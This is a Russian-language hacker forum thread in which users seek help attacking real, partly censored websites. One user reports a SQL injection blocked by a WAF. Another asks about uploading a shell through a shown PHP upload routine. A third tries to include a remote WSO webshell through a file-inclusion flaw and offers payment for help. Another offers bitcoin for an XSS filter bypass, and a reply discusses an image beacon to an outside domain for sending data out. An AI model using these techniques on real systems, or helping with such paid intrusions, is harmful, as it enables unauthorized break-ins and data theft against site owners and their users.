28.01.2017, 16:35
|
|
Познающий
Регистрация: 20.12.2016
Сообщений: 74
Провел на форуме:
19301
Репутация:
0
|
|
[QUOTE="SaNDER"]
↑
Error-Based SQL Injection .
WAF фильтрует concat .
*****.**/news.php?id=1 concat |
|
|
28.01.2017, 23:02
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
Залить шелл в таких условиях?
Код:
$uploaddir = "img/news/";
$temp=sha1(uniqid()).".jpg";
$uploadfile = $uploaddir . $temp;
move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
|
|
|
|
29.01.2017, 01:20
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от Octavian
↑
Залить шелл в таких условиях?
Только в фантазиях
|
|
|
|
29.01.2017, 02:02
|
|
Познающий
Регистрация: 20.12.2016
Сообщений: 74
Провел на форуме:
19301
Репутация:
0
|
|
|
|
|
|
29.01.2017, 03:18
|
|
Познающий
Регистрация: 20.12.2016
Сообщений: 74
Провел на форуме:
19301
Репутация:
0
|
|
и еще один вопрос, есть lfi:
Код:
Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает.
UPD:
Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную?
Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово.
В ЛС могу кинуть уязвимый код на пыхе |
|
|
|
01.02.2017, 18:17
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
|
|
|
|
02.02.2017, 18:05
|
|
Новичок
Регистрация: 01.01.2016
Сообщений: 21
Провел на форуме:
5299
Репутация:
0
|
|
XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:
Получаю:
Сайт №2
Отправляю:
Получаю
|
|
|
|
02.02.2017, 19:08
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript:там не нужен.
Во втором похоже на белый список атриббутов, фильтр вроде caja.
|
|
|
|
02.02.2017, 19:08
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Прочитай любую вводную стаью про SQL Injection.
|
|
|
|
02.02.2017, 19:27
|
|
Новичок
Регистрация: 18.03.2016
Сообщений: 5
Провел на форуме:
1415
Репутация:
6
|
|
Сообщение от Elva
↑
XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:
Получаю:
Сайт №2
Отправляю:
Получаю
1:
со вторым не факт, что получится, он вырезает лишние параметры из тега
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
